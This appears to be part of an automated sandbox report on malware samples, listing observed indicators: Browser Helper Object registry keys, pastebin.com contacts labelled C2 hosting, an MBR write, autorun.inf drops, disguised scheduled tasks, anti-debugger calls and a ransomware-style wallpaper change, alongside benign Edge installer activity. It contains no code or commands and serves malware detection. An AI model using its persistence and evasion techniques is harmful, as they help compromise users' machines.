Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\system32\wbem\wmiprvse.exe N/A

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "IEToEdge BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\Desktop\Files\random.exe N/A

Detected potential entity reuse from brand MICROSOFT.

phishing microsoft
Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Drops autorun.inf file

Description Indicator Process Target
File created F:\autorun.inf C:\Users\Admin\Desktop\Files\856.exe N/A
File opened for modification F:\autorun.inf C:\Users\Admin\Desktop\Files\856.exe N/A
File created C:\autorun.inf C:\Users\Admin\Desktop\Files\856.exe N/A
File opened for modification C:\autorun.inf C:\Users\Admin\Desktop\Files\856.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\svhost C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Discord C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\ctfmon C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\$77Security C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\$77svchost C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\StUpdate C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Test Task17 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1008898722-3518013580-3694625758-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\Desktop Background.bmp" C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\Files\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\PowerRat.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\af.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\it.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\msedge.dll.sig C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\vcruntime140.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\kk.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\vk_swiftshader.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\sr-Cyrl-BA.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\mr.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\uk.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\hu.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\kok.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\AdSelectionAttestationsPreloaded\manifest.json C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\pt-BR.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\am.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\resources.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\he.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\MEIPreload\preloaded_data.pb C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\MEIPreload\manifest.json C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Extensions\external_extensions.json C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\qu.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ar.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\qu.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\gl.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Temp\source2316_2140335734\MSEDGE.7z C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\msedge.exe C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Sigma\Content C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\edge_game_assist\EdgeGameAssist.msix C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Trust Protection Lists\Mu\Other C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\km.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\ms.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\nn.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Sigma\Other C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\es.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\bg.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\ko.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\microsoft_shell_integration.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Sigma\Advertising C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ne.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\VisualElements\LogoBeta.png C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Extensions\external_extensions.json C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\prefs_enclave_x64.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\as.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\nl.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\hu.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\133.0.3065.59.manifest C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\te.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\th.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\VisualElements\SmallLogo.png C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Trust Protection Lists\Sigma\Analytics C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Locales\bn-IN.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\mi.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\AdSelectionAttestationsPreloaded\ad-selection-attestations.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\concrt140.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\wns_push_client.dll C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\el.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\Locales\nn.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\kk.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Sigma\LICENSE C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\identity_proxy\beta.identity_helper.exe.manifest C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\AdSelectionAttestationsPreloaded\ad-selection-attestations.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Trust Protection Lists\Mu\Entities C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\ga.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Locales\bn-IN.pak C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\5892_13383894525762369_5892.pma C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\816aa4b7-5aad-4d5c-b75c-912e0fd35b69.tmp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
